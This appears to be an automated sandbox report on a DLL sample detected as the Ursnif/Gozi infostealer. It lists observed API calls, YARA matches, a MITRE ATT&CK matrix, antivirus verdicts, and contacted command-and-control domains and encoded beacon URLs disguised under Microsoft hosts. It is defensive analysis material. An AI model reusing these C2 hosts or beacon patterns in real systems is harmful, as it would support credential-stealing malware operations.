                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500413 Sample: 616412739e268.dll Startdate: 12/10/2021 Architecture: WINDOWS Score: 88 31 msn.com 2->31 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected  Ursnif 2->51 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 41 40.101.60.226, 443, 49783, 49821 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->41 43 breuranel.website 8->43 45 10 other IPs or domains 8->45 55 Writes or reads registry keys via WMI 8->55 57 Writes registry values via WMI 8->57 12 rundll32.exe 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        19 rundll32.exe 8->19         started        signatures6 process7 signatures8 59 System process connects to network (likely due to code injection or exploit) 12->59 61 Writes registry values via WMI 12->61 21 WerFault.exe 23 9 12->21         started        24 rundll32.exe 15->24         started        27 WerFault.exe 9 17->27         started        29 WerFault.exe 2 9 19->29         started        process9 dnsIp10 33 192.168.2.1 unknown unknown 21->33 35 breuranel.website 24->35 37 areuranel.website 24->37 39 9 other IPs or domains 24->39 53 System process connects to network (likely due to code injection or exploit) 24->53 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      616412739e268.dll6%VirustotalBrowse
                      616412739e268.dll24%ReversingLabsWin32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.loaddll32.exe.a30000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      6.2.rundll32.exe.31a0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://areuranel.website/0%Avira URL Cloudsafe
                      https://breuranel.website/0%Avira URL Cloudsafe
                      https://wweuranel.website/0%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://areuranel.website/V0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gw0%Avira URL Cloudsafe
                      https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_20%Avira URL Cloudsafe
                      https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrc0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.161.50
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		52.98.207.210
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.98.207.210
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    breuranel.website
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      outlook.office365.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                          		high
                                          https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                            		high
                                            https://msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jrefalse
                                              		high
                                              https://outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                                		high
                                                https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                                  		high
                                                  https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jrefalse
                                                    		high
                                                    https://msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jrefalse
                                                      		high
                                                      https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jrefalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://areuranel.website/rundll32.exe, 00000006.00000002.681813833.0000000003669000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://outlook.office365.com///loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534697625.0000000003688000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpfalse
                                                              		high
                                                              https://breuranel.website/rundll32.exe, 00000006.00000003.625046628.0000000003669000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://wweuranel.website/loaddll32.exe, 00000002.00000002.678162514.0000000000C62000.00000004.00000020.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://blogs.msn.com/loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmpfalse
                                                                		high
                                                                https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQloaddll32.exe, 00000002.00000003.593344627.0000000000CDA000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.593269471.0000000000CDC000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://deff.nelreports.net/api/report?cat=msnrundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.msn.com/en-us//api/modules/fetch&quot;loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://ogp.me/ns/fb#loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/7arS2rundll32.exe, 00000006.00000003.535020044.0000000003669000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0vrundll32.exe, 00000006.00000003.624898872.000000000368B000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/?refurl=%2fmail%2fliopolo%2fiPe0RJr3YRoIqgJZ%2fbp29G1GzQQlGJM_%2f2FuLuVprzaPw0SErundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://msn.com/loaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://outlook.office365.com/loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://msn.com/Hloaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://areuranel.website/Vloaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
